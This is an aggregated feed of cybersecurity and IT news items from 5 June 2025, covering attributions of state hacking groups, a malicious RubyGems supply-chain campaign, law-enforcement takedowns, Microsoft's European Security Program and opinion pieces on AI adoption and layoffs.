Cellebrite and Corellium, whose names have been mentioned in spyware stories, are joining forces to provide advanced investigative solutions. The post Controversial Firms Cellebrite and Corellium Announce $200 Million Acquisition Deal appeared first on SecurityWeek.

https://www.securityweek.com/controversial-firms-cellebrite-and-corellium-announce-200-million-acquisition-deal/
New evidence links long-running hacking group to Indian government
2025-06-05T12:34:06Z | 1749126846

Two cybersecurity companies issued reports tying a cyber-espionage group known as Bitter or TA397 more directly to the Indian government.

https://therecord.media/india-cyber-espionage-bitter-ta397
Phone unlocking firm Cellebrite to acquire mobile testing startup Corellium for $170M
2025-06-05T12:17:24Z | 1749125844

Cellebrite said the deal will help with the "accelerated identification of mobile vulnerabilities and exploits."

https://techcrunch.com/2025/06/05/phone-unlocking-firm-cellebrite-to-acquire-mobile-testing-startup-corellium-for-170m/
Microsoft launches European Security Program to counter nation-state threats
2025-06-05T12:16:40Z | 1749125800

Microsoft (Nasdaq:MSFT) has announced a comprehensive cybersecurity program that will provide free AI-powered defense tools to European governments facing increasing attacks from Russian, Chinese, Iranian, and North Korean state-sponsored hackers. The European Security Program, unveiled in Berlin by Microsoft Vice Chair Brad Smith, will offer threat intelligence, automated attack disruption, and investigative support to all 27 EU member states, plus the UK, the EU accession countries, and European Free Trade Association members at no cost. “Ransomware groups and state-sponsored actors from Russia, China, Iran, and North Korea continue to grow in scope and sophistication, and European cyber protection cannot afford to stand still,” Smith wrote in a blog post. The program represents an expansion of Microsoft’s existing Government Security Program and implements one of five European Digital Commitments the company made in Brussels five weeks ago. Rising threat environment Microsoft’s move comes as the company documents persistent threat activity targeting European networks. Russian operators remain focused on Ukraine and European nations supporting Ukraine’s defense efforts, while Chinese threat actors have launched systematic campaigns against academic institutions and think tanks. The threat landscape has grown more complex with AI entering cybersecurity operations. Microsoft now tracks threat actors using AI for reconnaissance, vulnerability research, social engineering, and brute force attacks. “Microsoft has observed AI use by threat actors for reconnaissance, vulnerability research, translation, LLM-refined operational command techniques, resource development, scripting techniques, detection evasion, social engineering, and brute force attacks,” Smith added. Three-component strategy The European Security Program will operate through three main components designed to strengthen continental cyber defenses. The first element centers on enhanced threat intelligence sharing, where Microsoft will provide European governments with AI-enhanced, real-time insights into nation-state tactics. The company’s Digital Crimes Unit will expand intelligence sharing through the Cybercrime Threat Intelligence Program, giving European partners immediate access to takedown operations and threat actor movements, the blog added. The program’s second component focuses on strengthening cybersecurity capacity through direct collaboration. Microsoft is embedding its investigators inside Europol’s European Cybercrime Centre in The Hague through a pilot program that will create joint investigation capabilities. The company has also renewed its partnership with the CyberPeace Institute, deploying nearly 100 Microsoft volunteers to defend vulnerable targets. The third element involves expanding disruption partnerships through the Statutory Automated Disruption Program, launched in April 2025. This system automatically triggers legal abuse notifications to hosting providers, rapidly dismantling malicious domains and IP addresses across Europe and the US. Each participating government will receive a dedicated Microsoft point of contact to coordinate responses and escalate concerns. Strategic and competitive implications Industry analysts view the program as strategically significant beyond cybersecurity. Praharsh Srivastava, senior analyst at Everest Group, said Microsoft’s initiative positions the company “ahead of rivals like Google Cloud, AWS, and IBM” while building long-term government relationships that “may drive future commercial gains through paid services, cloud adoption, and AI solutions.” Sanchit Vir Gogia, chief analyst at Greyhound Research, described the program as “a strategic escalation in the platform wars, where cybersecurity is no longer a revenue line — it is a loyalty lock.” “By embedding premium services—from forensic investigations to national-level threat coordination—into a zero-cost model, Microsoft is not just displacing point solution vendors. It’s solidifying its claim as a foundational infrastructure partner,” Gogia said. Track record of operations Microsoft brings substantial experience to the initiative. The company has conducted seven legal actions against nation-state threat actors since 2016, targeting groups it internally codes as Blizzard (Russia), Typhoon (China), Sandstorm (Iran), and Sleet (North Korea). Recent operations demonstrate this capability. In September 2024, Microsoft disrupted Russian group Star Blizzard’s activities, seizing over 140 malicious domains and forcing the group to abandon established attack methods. Last month, the company worked with Europol to take down the Lumma infostealer malware, neutralizing nearly 400,000 infected devices and seizing over 2,300 command-and-control domains. Digital sovereignty and operational challenges The program, however, raises questions about European digital sovereignty and operational complexity. Srivastava noted that while Microsoft’s initiatives offer immediate cybersecurity benefits, they “intersect with the EU’s emphasis on digital sovereignty and may increase dependency on non-European providers.” Gogia highlighted coordination challenges across Europe’s diverse landscape. “There is no common legal backbone across EU states for defining, reporting, or remediating cyber threats,” he observed. “What counts as a critical incident in one country may not even trigger an alert in another.” The program arrives as European policymakers implement comprehensive cybersecurity frameworks, including the EU’s Network and Information Security Directive and the proposed Cyber Resilience Act. Microsoft said it will make the program available immediately to eligible European governments. The initiative extends beyond immediate threat response to include investments in cybersecurity research, talent development, and open-source security improvements.

https://www.csoonline.com/article/4002444/microsoft-launches-european-security-program-to-counter-nation-state-threats.html
ClickFix Email Scam Alert: Fake Booking.com Emails Deliver Malware
2025-06-05T12:02:43Z | 1749124963

Cofense Intelligence uncovers a surge in ClickFix email scams impersonating Booking.com, delivering RATs and info-stealers. Learn how these…

https://hackread.com/clickfix-email-scam-fake-booking-com-emails-malware/
Supply chain attack hits RubyGems to steal Telegram API data
2025-06-05T12:01:43Z | 1749124903

An ongoing supply chain attack is targeting the RubyGems ecosystem to publish malicious packages intended to steal sensitive Telegram data. Published by a threat actor using multiple accounts under aliases Bùi nam, buidanhnam, and si_mobile, the malicious gems (ruby packages) pose as legitimate Fastlane plugins and exfiltrate data to an actor-controlled command and control (C2) server. Fastlane is a popular open-source tool, used extensively in CI/CD pipelines, to automate building, testing, and releasing mobile apps (iOS and Android). “Malicious actors take advantage of the trust inherent in open-source environments by embedding harmful code that can jeopardize systems, steal sensitive information, or, in this case, misdirect critical API traffic,” said Eric Schwake, director of cybersecurity strategy at Salt Security. “The identification of certain Ruby gems aimed at exfiltrating Telegram API tokens and messages highlights a significant and ongoing risk to the software supply chain.” The ongoing attack was first spotted by Socket’s Threat Research Team, who noted that the malicious gems appeared just days after Vietnam’s nationwide Telegram ban, likely to exploit the heightened demand for Telegram workarounds with “proxy” offerings. Two rogue plugins in circulation Threat actor published two malicious gems: “fastlane-plugin-telegram-proxy” and “fastlane-plugin-proxy_telegram,” near-identical clones of the legitimate “fastlane-plugin-telegram.” While the packages retained all the same functionalities and documentation of the legitimate plugin, they added a critical alteration. The modified gems featured a redirect for all Telegram API traffic to an actor-controlled C2. “These gems silently exfiltrate all data sent to the Telegram API (used by the Fastlane plugin) by redirecting traffic through a C2 server controlled by the threat actor,” security researcher Kirill Boychenko said in a blog post. “This includes bot tokens, chat IDs, message content, and attached files.” Threat actors modified the legitimate plugin behavior of sending messages to Telegram using the Telegram Bot API by replacing the Telegram API endpoint (https:/api.telegra.org) with their own (C2) server. “A single line swap rerouted every Telegram API call through a Cloudflare Worker under an attacker’s control, siphoning tokens, files, IDs, and more,” said Jason Soroko, Senior Fellow at Sectigo. Risk may extend past the regional ban The malicious packages (Gems) were published by the threat actor on May 24, 2025, three days after Vietnam’s Ministry of Information and Communications ordered a nationwide ban on Telegram and gave internet service providers until June 2 to report compliance. Apart from the timing, the aliases used by the threat actor also suggested a Vietnamese theme, along with the “Telegram proxy” hook used for marketing the gems. While seemingly targeted, the attack may still have impacts outside of the ban. “The operator, using Vietnamese-language aliases, pushed the gems days after Vietnam banned Telegram, but the code has no geofence, so any Fastlane pipeline that pulled the plugin was compromised,” Soroko explained. For potential targets, Boychenko recommended verifying Telegram proxies—if they are looking for one—by checking for open-source licensing, transparent author details, configurable endpoints (not silent, hardcoded replacements), and clear privacy and logging policies. Typosquatting dependencies remain a popular supply chain attack technique. Recently, attackers were found dropping over 60 malicious npm packages within two weeks to steal network information, a discovery also reported by Boychenko. Malicious actors have also begun a novel approach of exploiting AI hallucinations to carry out SlopSquatting attacks, publishing malicious packages with names that AI tools might incorrectly suggest to developers.

https://www.csoonline.com/article/4002437/supply-chain-attack-hits-rubygems-to-steal-telegram-api-data.html
#Infosec2025: Seven Steps to Building a Mature Vulnerability Management Program
2025-06-05T12:00:00Z | 1749124800

At Infosecurity Europe 2025, Axonius’ Jon Ridyard proposed seven best practices to build mature vulnerability management processes

https://www.infosecurity-magazine.com/news/infosec2025-seven-steps/
UNC1151 exploiting Roundcube to steal user credentials in a spearphishing campaign
2025-06-05T12:00:00Z | 1749124800

CERT Polska is observing a malicious email campaign conducted by the UNC1151 group against Polish entities, exploiting a vulnerability in the Roundcube software.

https://cert.pl/en/posts/2025/06/unc1151-campaign-roundcube/
2 Certificate Authorities Now Distrusted by Google — Due to Compliance Issues
2025-06-05T12:00:00Z | 1749124800

Security leaders share their thoughts on the importance of compliance and trust for certificate authorities.

https://www.securitymagazine.com/articles/101672-2-certificate-authorities-now-distrusted-by-google-due-to-compliance-issues
Men Who Hacked Law Enforcement Database for Doxing Sentenced to Prison
2025-06-05T11:56:24Z | 1749124584

Sagar Steven Singh and Nicholas Ceraolo, members of the Vile group, get prison sentences for identity theft and hacking. The post Men Who Hacked Law Enforcement Database for Doxing Sentenced to Prison appeared first on SecurityWeek.

https://www.securityweek.com/men-who-hacked-law-enforcement-database-for-doxing-sentenced-to-prison/
ClickFix Attack Exploits Fake Cloudflare Turnstile to Deliver Malware
2025-06-05T11:46:09Z | 1749123969

Researchers have discovered and analyzed a ClickFix attack that uses a fake Cloudflare ‘humanness’ check. The post ClickFix Attack Exploits Fake Cloudflare Turnstile to Deliver Malware appeared first on SecurityWeek.

https://www.securityweek.com/clickfix-attack-exploits-fake-cloudflare-turnstile-to-deliver-malware/
Germany fines Vodafone $51 million for privacy, security breaches
2025-06-05T11:29:18Z | 1749122958

The German data protection authority (BfDI) has fined Vodafone GmbH, the telecommunications company's German subsidiary, €45 million ($51.4 million) for privacy and security violations.

https://www.bleepingcomputer.com/news/security/germany-fines-vodafone-51-million-for-privacy-security-breaches/
100,000 accounts have been hit in a HMRC scam campaign, but the tax office says it wasn't hacked – here's why
2025-06-05T11:26:03Z | 1749122763

Organized criminals used phished data to set up dodgy HMRC accounts and demand tax rebates

https://www.itpro.com/security/hmrc-scam-account-campaign
Redefining Cyber Value: Why Business Impact Should Lead the Security Conversation
2025-06-05T11:25:00Z | 1749122700

Security teams face growing demands with more tools, more data, and higher expectations than ever. Boards approve large security budgets, yet still ask the same question: what is the business getting in return? CISOs respond with reports on controls and vulnerability counts – but executives want to understand risk in terms of financial exposure, operational impact, and avoiding loss. The...

https://thehackernews.com/2025/06/redefining-cyber-value-why-business.html
FBI Aware of 900 Organizations Hit by Play Ransomware
2025-06-05T11:16:39Z | 1749122199

Play ransomware attacks have hit roughly 900 organizations and recently involved the exploitation of SimpleHelp vulnerabilities. The post FBI Aware of 900 Organizations Hit by Play Ransomware appeared first on SecurityWeek.

https://www.securityweek.com/fbi-aware-of-900-organizations-hit-by-play-ransomware/
SAP Marks Fifth Consecutive Year as a Leader in QKS Group SPARK Matrix™ for Digital Twin of an Organization (DTO)
2025-06-05T11:15:00Z | 1749122100

This leadership position highlights our commitment to helping enterprises navigate complexity with agility, intelligence, and confidence.

https://news.sap.com/2025/06/fifth-consecutive-year-leader-spark-matrix-dto/
The ROI of AI: Why impact > hype
2025-06-05T11:09:00Z | 1749121740

“Don’t start with what AI can do. Start with what your business needs to do better.”  That quote captures the most important lesson I’ve learned from working closely with dozens of organizations implementing AI. While the headlines obsess over the latest breakthroughs in generative AI or agent-based models, the real question executives should be asking is: How will this help us solve the problems that matter most to our business? We’re at a turning point. AI is no longer confined to innovation labs or proof-of-concepts. It’s being embedded in operations, products and customer experiences across every industry. But for all the excitement, many companies are still struggling to extract real value. Too many AI initiatives start with the tools, not the outcomes. And when that happens, hype overwhelms impact. I want to share what I’ve seen work — and not work — when it comes to driving ROI from AI investments. I’ll draw from real-world customer experiences, third-party research and my own observations, helping organizations align AI to business goals. The good news? When companies focus on outcomes, not just algorithms, AI delivers extraordinary returns.  The problem: When AI becomes a distraction AI can be a powerful enabler, but only when deployed with intention and purpose. Too often, companies rush into AI projects without a clear problem to solve. The result? Initiatives that lack a path to production, are owned by no one and deliver little to no value. I’ve seen the same failure patterns repeat: AI pilots that never scale, fragmented and disconnected tools introduced without alignment to existing processes and impressive demos that quickly gather dust. Research confirms this trend: many AI projects fail to produce ROI because they aren’t anchored to measurable business outcomes. A better way: Start with outcomes, not algorithms AI projects should begin not with the tool, but with the business problem. A more effective approach starts by defining the desired outcome and working backward to determine where AI can make a meaningful impact. When evaluating potential AI initiatives, organizations should ask two core questions: First, understand the business impact. Will this improve speed, reduce cost, increase accuracy or enhance customer experience? Next, evaluate the business differentiation. Will it give us a competitive edge by enabling something better, faster or more intelligent than the status quo? The most compelling opportunities lie at the intersection of operational efficiency and strategic differentiation. These aren’t proof-of-concepts; they’re business accelerators that deliver real value aligned against your strategic outcomes. Whether it’s shortening decision cycles, improving customer response times or optimizing resource allocation, the value lies in applying AI where it enhances performance and sets the business apart. AI shouldn’t be deployed just to tick an innovation box. Its purpose is to eliminate friction, unlock new value and reinforce the workflows that matter most. When organizations begin with a clear understanding of the outcomes they want to achieve, they can move beyond tactical wins and toward scalable, sustained impact. That outcome-first mindset is what separates AI hype from genuine ROI. The ROI of doing it right: What the data says Recent research from Nucleus Research provides concrete evidence of the ROI possible when AI and no-code automation are tightly aligned to business priorities. Based on interviews with enterprises, Nucleus found that organizations adopting this approach achieved substantial and measurable business results. Organizations reported an average 37% reduction in total technology costs, driven by simplified integrations, reduced IT overhead and a more predictable pricing structure. These cost savings were complemented by a 70% reduction in implementation timelines, allowing organizations to go live faster and realize value sooner compared to traditional platforms. Operational efficiency also improved significantly. One key area was lead management: customers cited a 61% decrease in lead response times, supported by real-time routing and automation, which led to an 11% average increase in conversion rates. In parallel, AI-enabled workflow automation reduced manual data entry by 17%, freeing up employee time and increasing productivity. Perhaps most importantly, customers reported that these gains helped them become more agile in responding to market conditions and sustaining continuous improvement, reinforcing that AI success is not just about savings, but about enabling scale, speed and adaptability across the business. The organizations that follow these 5 principles maximize AI ROI The difference between hype and impact often comes down to execution. In my experience, the organizations seeing the strongest ROI from AI share five habits: 1. Start with a business goal Before you write a line of code, align AI with a specific operational outcome The most successful AI initiatives start with clarity. That means defining exactly what needs to change, whether it’s reducing customer churn, speeding up internal workflows, improving forecasting or enhancing user engagement. Without a clear goal, even a technically sound AI solution may fail to gain traction. I always encourage teams to avoid jumping straight into building or buying solutions. Instead, pause to align on KPIs. What will success look like? How will we measure improvement? That clarity keeps projects grounded. Example: A sales organization wanted to improve forecasting accuracy and reduce the time spent on manual pipeline updates. By applying AI use against these priority outcomes, they began by having AI analyze sales activity data and automatically score deal likelihood, they reduced forecast variance by 25% and freed up reps to spend more time selling. 2. Don’t automate for the sake of it. Target friction Prioritize augmenting high-friction processes, don’t chase novelty Not every process needs AI and not every AI use case creates real value. The best returns come when AI addresses bottlenecks that were previously too manual, error-prone or inconsistent. That’s where AI adds tangible speed, scale and intelligence. A good litmus test is this: If a process already runs smoothly and quickly, automating it with AI may yield minimal ROI. But if it involves repeated back-and-forth, time-consuming review or judgment-based decisions, AI can drastically improve throughput and consistency. Example: Marketing teams often have access to large amounts of fragmented data but lack the ability to rationalize it and analyze it effectively.   This missed opportunity led a bank’s marketing team to use AI to optimize campaign targeting by analyzing historical performance and real-time engagement data. The result was a 20% increase in click-through rates and fewer wasted impressions across digital channels. 3. Make AI transparent, trackable and tied to metrics Start with explainable, measurable use cases and track improvements The ability to track AI’s contribution isn’t just important for ROI reporting — it’s essential for trust. Business users are more likely to embrace AI when they understand what it’s doing and why. This means surfacing decision logic, offering override options and building a feedback loop. At the same time, measurement must be built in from the beginning. Don’t wait until after launch to define success criteria. Know upfront how you’ll measure efficiency gains, quality improvements or time saved. Example: A customer service team for a regional manufacturing firm implemented AI to suggest next-best responses and assist with case summarization. By measuring reduction in average handle time and improvements in first contact resolution, they built internal confidence in the use of AI models and justified broader rollout. 4. Think beyond the pilot. Design for real-world use Ensure adoption through UX + training and not just deployment  AI must be easy to use and deeply integrated into the tools people already rely on. That requires thoughtful UX and a rollout plan that includes not only training, but context: why the AI exists, how it helps and what users can expect. Too many AI pilots fail not because the model is inaccurate, but because the experience is disconnected. It feels bolted on, unfamiliar or hard to access. The best implementations remove steps, not add them. Example: A city government integrated AI into their case system and 311 processes. With minimal training, adoption surged because the AI was actually simpler and easier to use and actually saved staff time. 5. Build for change, not one-off wins Design for adaptability. Processes and AI will evolve Your first version of an AI solution won’t be your last and it shouldn’t be. Business priorities evolve, data changes and models drift. That’s why adaptability is critical. Rather than locking in hard-coded logic or static integrations, use configurable no-code platforms that allow adjustments without heavy engineering. Equip your teams with tools to fine-tune processes over time. The goal isn’t just initial success, but rather sustainability. Example: A customer success team used AI to monitor account health and proactively flag churn risks. Over time, they continually adjusted the model using no-code tools to include new behavior patterns and feedback from account managers, ensuring the system remained relevant and accurate. AI that works for the business, not the hype The companies seeing real returns from AI aren’t chasing trends but rather solving real problems. They treat AI not as a novelty, but as a lever for operational scale, decision velocity and competitive edge. When done right, AI becomes a multiplier. It sharpens execution, accelerates learning and personalizes at scale. The takeaway? Success doesn’t start with the model. It starts with a business problem worth solving. So, ask yourself: Where is your ROI hiding? Where is your untapped value? That’s where AI belongs. This article is published as part of the Foundry Expert Contributor Network.Want to join?

https://www.cio.com/article/4001889/the-roi-of-ai-why-impact-hype.html
Vulnerability in 2ClickPortal software
2025-06-05T11:00:00Z | 1749121200

SQL Injection vulnerability (CVE-2025-4568) has been found in 2ClickPortal software.

https://cert.pl/en/posts/2025/06/CVE-2025-4568/
Iran-Linked BladedFeline Hits Iraqi and Kurdish Targets with Whisper and Spearal Malware
2025-06-05T10:59:00Z | 1749121140

An Iran-aligned hacking group has been attributed to a new set of cyber attacks targeting Kurdish and Iraqi government officials in early 2024. The activity is tied to a threat group ESET tracks as BladedFeline, which is assessed with medium confidence to be a sub-cluster within OilRig, a known Iranian nation-state cyber actor. It's said to be active since September 2017, when it targeted...

https://thehackernews.com/2025/06/iran-linked-bladedfeline-hits-iraqi-and.html
Australia Tightens Data Privacy Laws – Till Payments’ Madhuri Nandi Explains What’s Next
2025-06-05T10:56:13Z | 1749120973

As data breaches rise and public trust flickers, Australia has taken a bold step in reforming its Privacy Act, marking one of the significant regulatory shifts in the region’s digital history. To decode what this means for businesses, The Cyber Express sat down with Madhuri Nandi, Head of Security at Till Payments, Australia.  With nearly 20 years in cybersecurity leadership, Nandi brings a sharp perspective on how these changes impact legal, IT, and security teams alike.  Madhuri Nandi Explains the Expanded Definition of Personal Data  In the interview, Nandi highlights that the sheer scale of recent breaches in Australia triggered the Privacy Act overhaul, pointing to the outdated nature of the previous regulations. She explains that the definition of personal data has now broadened to include behavioral and inferred data, increasing accountability for companies collecting and processing user information.  “You’re not playing the small game anymore. If you don’t handle data properly, you’re looking at penalties as high as $50 million or 30% of your turnover,” she warns.  Nandi also notes a cultural shift: where once privacy was a checkbox exercise, now legal and cybersecurity teams are collaborating from the start of the product lifecycle.   On the broader opportunity, she adds, “Businesses that respect data today are the ones who will win customer trust and competitive edge tomorrow.”  The conversation also touches on the role of AI and personal data risks, as well as the strengthened powers of the Office of the Australian Information Commissioner (OAIC) to audit organizations without formal complaints.  Watch the Full Interview:  To dive deeper into Madhuri Nandi’s expert insights on regulatory trends, privacy-first leadership, and cybersecurity best practices in Australia, Click here to watch the full interview on YouTube

https://thecyberexpress.com/madhuri-nandi-interview/
Data hoarding can have financial and security consequences
2025-06-05T10:40:31Z | 1749120031

End-of-life data management, be it deletion of what is no longer required, or data removal from hardware before it’s decommissioned, may not get the attention that data loss through breaches generates, but it’s equally critical — and equally dangerous, with almost half of enterprises failing to destroy data they no longer need, according to a new survey. In its 2025 State of Data Sanitization Report, released on Wednesday, data erasure specialist Blancco revealed that companies globally are being driven to react to these risks by pressures around data security (especially with the advent of AI), regulatory compliance, and sustainability. While 86% of enterprises have suffered a data breach in the last three years, 73% have experienced a data leak, typically caused by process failure or human error, according to the survey of 2,000 cybersecurity, IT, and sustainability leaders at large enterprises around the world.

https://www.computerworld.com/article/4002376/data-hoarding-can-have-financial-and-security-consequences.html
HMRC: Crooks broke into 100k accounts, stole £43M from British taxpayer in late 2024
2025-06-05T10:34:42Z | 1749119682

It’s definitely not a cyberattack though! Really! The UK's tax collections agency says cyberbaddies defrauded it of £47 million ($63 million) late last year, but insists the criminal case was not a cyberattack.

https://go.theregister.com/feed/www.theregister.com/2025/06/05/hmrc_fraudsters_broke_into_100k/
New four-year project continues to strengthen cybersecurity in the EU – follow upcoming funding opportunities
2025-06-05T10:28:31Z | 1749119311

During the project, financial support will be granted for activities such as implementing new cybersecurity regulations. The aim is to strengthen cybersecurity both in Europe and nationally.

https://www.kyberturvallisuuskeskus.fi/en/news/new-four-year-project-continues-strengthen-cybersecurity-eu-follow-upcoming-funding
New four-year project continues to strengthen cybersecurity in the EU – follow upcoming funding opportunities
2025-06-05T10:28:31Z | 1749119311

During the project, financial support will be granted for activities such as implementing new cybersecurity regulations. The aim is to strengthen cybersecurity both in Europe and nationally.

https://www.kyberturvallisuuskeskus.fi/en/news/new-four-year-project-continues-strengthen-cybersecurity-eu-follow-upcoming-funding
Carding Marketplace BidenCash Shut Down by Authorities
2025-06-05T10:17:55Z | 1749118675

Authorities seized 145 domains associated with BidenCash, a marketplace for stolen credit cards and personal information. The post Carding Marketplace BidenCash Shut Down by Authorities  appeared first on SecurityWeek.

https://www.securityweek.com/carding-marketplace-bidencash-shut-down-by-authorities/
DoJ Seizes 145 Domains Tied to BidenCash Carding Marketplace in Global Takedown
2025-06-05T10:16:00Z | 1749118560

The U.S. Department of Justice (DoJ) on Wednesday announced the seizure of cryptocurrency funds and about 145 clearnet and dark web domains associated with an illicit carding marketplace called BidenCash. "The operators of the BidenCash marketplace use the platform to simplify the process of buying and selling stolen credit cards and associated personal information," the DoJ said. "BidenCash...

https://thehackernews.com/2025/06/doj-seizes-145-domains-tied-to.html
Moderna’s HR-IT merger: Trend or exception to the rule?
2025-06-05T10:16:00Z | 1749118560

Moderna has made headlines in recent weeks for an unusual structural shift that blends two traditionally separate functions: human resources and information technology. Following the departure of its CIO and a trimming of its digital team, the company folded the IT department under the leadership of its chief human resources officer. For many, this raised eyebrows. Is Moderna predicting a new normal where HR and IT converge, especially in an AI-first enterprise? Possibly, but I don’t think so. Moderna’s decision is bold and, in many ways, unprecedented. But I would recommend that it should not be mistaken as a sign of things to come across the broader enterprise landscape. Not yet anyway. Context is important in understanding the company’s decision here. (See also: Taking stock of human capital in the age of AI.) The context behind Moderna’s decision To understand the rationale, we must consider the factors unique to this company. Moderna is a pioneer in biotechnology and a trailblazer in adopting artificial intelligence (AI) across its operations. From drug discovery to digital marketing, AI is deeply embedded in its strategic road map. In fact, as reported in TheInformation.com, it appears that a conversation about ChatGPT was a key catalyst in Moderna’s decision to merge HR and IT.CEO Stéphane Bancel reportedly saw the increasing entanglement of AI in workplace functions and organizational design as an opportunity to reimagine how Moderna’s tech and its people interface. Moderna has also partnered extensively with OpenAI, leveraging advanced AI systems not just for scientific innovation but also for back-office efficiency. A recent article details how Moderna uses OpenAI’s tools to streamline both technical and HR-related workflows for automating candidate screening, internal ticketing, and employee onboarding. In such an environment, where AI acts as the connective tissue between systems and people, the argument to bring HR and IT together is certainly intriguing and not surprising. Jensen Huang, NVIDIA’s CEO, hinted at this evolution when he said, “In a lot of ways, the IT department of every company is going to be the HR department of AI agents in the future.” At Moderna, this vision is not theoretical; it is already in motion. But the capability to act on this convergence is contingent on something Moderna happens to have already: an HR leader with deep technological acumen. (See also: Why HR professionals struggle with big data.) Tracey Franklin: A unique catalyst Moderna’s HR-IT merger is less about an industry trend and more about the capability of one individual: Tracey Franklin. As The Wall Street Journal reported, Franklin’s background includes not only traditional HR expertise but also a strong grasp of the company’s digital transformation initiatives. She is not a typical CHRO. Her ability to lead both domains stems from her proximity to Moderna’s evolving AI strategy and her alignment with the executive vision of a highly integrated enterprise. This type of executive is rare. Most CHROs, while highly skilled in people strategy and organizational design, do not possess the technical depth required to lead IT. Conversely, most CIOs are not equipped to take on employee experience or talent development at scale. Moderna’s situation is not easily replicable because it is built on a unique overlap of leadership capability, organizational maturity, AI fluency, and an existing executive team member capable of tackling them all. Why this model won’t work for everyone It is tempting to view Moderna’s move as a bellwether for the future as AI takes a stronger and deeper foothold within enterprises. However, broader enterprise trends suggest otherwise. AI adoption is still nascent in many companies, and even where it is growing, the tools are often siloed within specific functions like customer support, marketing automation, or supply chain optimization. The level of enterprisewide AI integration that Moderna exhibits is the exception, not the rule. Most of the AI adoption is currently happening based on the AI capabilities that traditional IT and SaaS vendors are building into their offerings, rather than specific and targeted AI implementations being custom-built within an enterprise for a specific workflow and purpose. In addition, organizational design is historically slow to evolve. The risks of combining IT and HR, which are two departments with vastly different cultures, compliance requirements, and performance metrics, are nontrivial. Even at Moderna, the change followed layoffs and leadership turnover, suggesting that it was at least partly a restructuring driven by internal realignment rather than a proactive, strategic, leading indicator of a wider organizational model. It is also important to note that cautionary tales are still emerging with regard to AI adoption. Gizmodo recently reported that Klarna, a fintech company that once leaned heavily into AI to replace human customer service, is now hiring back human staff due to AI shortfalls in empathy and nuance. The implication is that while AI can augment, it rarely replaces human judgment wholesale, particularly in functions like HR that are inherently nuanced in human interactions and interpersonal relationships. (See also: Legacy federal government HR systems: A billion dollar problem, says Workday survey.) The CIO Perspective: Focus on partnership, not merger As CIOs, we should see Moderna’s move not as a threat to our domain but as a signal of evolving partnerships and collaboration. The CIO’s role has been evolving to become more strategic and more cross-functional for quite some time, and this is only growing in importance as AI redefines how work gets done. But merging with HR is not a necessary step to lead in this transformation. Instead, CIOs should work closely with CHROs to establish clear collaboration models where AI-driven decisions are transparent, ethical, and human-centered. CIOs will continue to own the architecture, security, and integration of AI platforms. HR will continue to shape the experience of employees (and now AI agents) within that digital environment. These domains must collaborate deeply, but structural integration is not necessary and, in most cases, counterproductive. Moderna’s HR-IT fusion is innovative, but it’s also deeply situational and very unique. It reflects the specific capabilities of its leadership, the depth of its AI integration, and its willingness to experiment. For most organizations, the future lies not in merging these departments, but in aligning them and building collaborative relationships with shared goals, mutual understanding, and the right balance between human and machine capabilities. So, while the Moderna case is worth watching, it should be viewed as a singular experiment, not a template. The CIO and CHRO will be powerful allies in the age of AI, but they are still best kept in separate seats at the table. Learn more about IDC’s research for technology leaders OR subscribe today to receive industry-leading research directly to your inbox. International Data Corporation (IDC) is the premier global provider of market intelligence, advisory services, and events for the technology markets. IDC is a wholly owned subsidiary of International Data Group (IDG Inc.), the world’s leading tech media, data, and marketing services company. Recently voted Analyst Firm of the Year for the third consecutive time, IDC’s Technology Leader Solutions provide you with expert guidance backed by our industry-leading research and advisory services, robust leadership and development programs, and best-in-class benchmarking and sourcing intelligence data from the industry’s most experienced advisors. Contact us today to learn more. Dr. Ken Knapton is an adjunct research advisor for IDC’s IT Executive Programs (IEP). He is a thought leader in enterprise tech debt, big data governance, and agile delivery principles. And he is an accomplished technology leader with extensive experience in leading IT functions, driving efficiency, enabling workflow automation, and delivering improved business outcomes. He has held C-level IT roles in various industries for the past two decades, with a focus on regulatory compliance as well as modernizing, maturing, and securing IT organizations. With his strong focus on people, process, and technology (in that order) he has helped to elevate the IT operations in organizations such as Merrick Bank, Content Watch, Access Data, W.J. Bradley Mortgage Capital, Credit.com, and Avalon Healthcare. Dr. Knapton helped design and architect the global banking system that is currently in use for the Church of Jesus Christ of Latter-day Saints, supporting 127 different currencies in as many countries.

https://www.cio.com/article/4002321/modernas-hr-it-merger-trend-or-exception-to-the-rule.html
Company boards push CEOs to replace IT workers with AI
2025-06-05T10:01:00Z | 1749117660

A huge wave of IT layoffs — with more than 238,000 jobs lost in 2024 and another 76,000 so far in 2025 — isn’t likely to die down soon, as organizations brace for a potential recession and look for huge workforce cuts through the use of AI. While many AI evangelists have played down the potential for the technology to replace human workers, that message hasn’t resonated in board rooms, as company leaders look to reinvent their business operations, IT hiring experts say. Many boards of directors are now pushing CEOs to cut 20% of workforce costs, with the expectation that AI will take over the eliminated jobs, says Camille Fetter, CEO at Talentfoot Executive Search & Staffing. Spurred in part by worries of a coming recession, many companies are prioritizing efficiency and agility, she adds. “Companies are reconfiguring their org charts to improve efficiency and reduce middle management bloat,” Fetter adds. “I’m at CEO dinners constantly, and they’re all saying, ‘If you don’t have plans to replace at least 20% of your workforce with these new technologies and efficiencies, then you’re not looking through the right lens.’” May is a bad month In May alone, Microsoft announced layoffs of 3% of its workforce, about 6,000 people, after CEO Satya Nadella noted earlier that up to 30% of the company’s own code is written by AI. Days later, Walmart announced 1,500 layoffs, with members of its global tech team among them. Less than a week after the Walmart cuts, IBM reportedly laid off 8,000 employees, with many HR workers replaced by AI. Along with a push for efficiency through AI, responsible company leaders have also created plans for weathering a recession, Fetter says, even as J.P. Morgan Research has reduced the probability of a recession starting in 2025 from 60% to 40%. “CEOs all have a recession plan that they probably have solidified by probably the end of Q1,” Fetter says. “Sadly, a lot of those recession plans basically were dusted off from the pandemic, but now with a new layer of AI.” A shift in the workforce Other IT employment experts see some of the same trends. Companies looking to grow are shifting away from mass hiring and toward selective scaling, Patrice Williams-Lindo, CEO of career coaching firm Career Nomad. “Companies are trimming legacy roles while quietly hiring for new AI-augmented positions,” she says. “The ‘net job loss’ headline masks a deeper reallocation of labor — from operational maintenance to innovation hubs and AI integration roles.” Williams-Lindo sees the impact of AI not only in replacing jobs, but also in displacing skill sets. Midlevel IT support, QA testing, and some software engineering jobs are increasingly automated, she says. Over the long term, a new kind of workforce will emerge, she says. “Tech layoffs are no longer just a market correction — they’re a quiet restructuring of the entire digital labor economy,” Williams-Lindo adds. “And the workers being cut? They’re often the very ones who built it.” The irony of replacing workers with AI is that technology still needs employees to watch over it, she adds. “AI is creating a massive new demand for reskilled professionals who can train, manage, and govern these systems,” Williams-Lindo says. “Those who pivot into AI fluency and digital ethics will thrive. Those who don’t risk being left behind.” 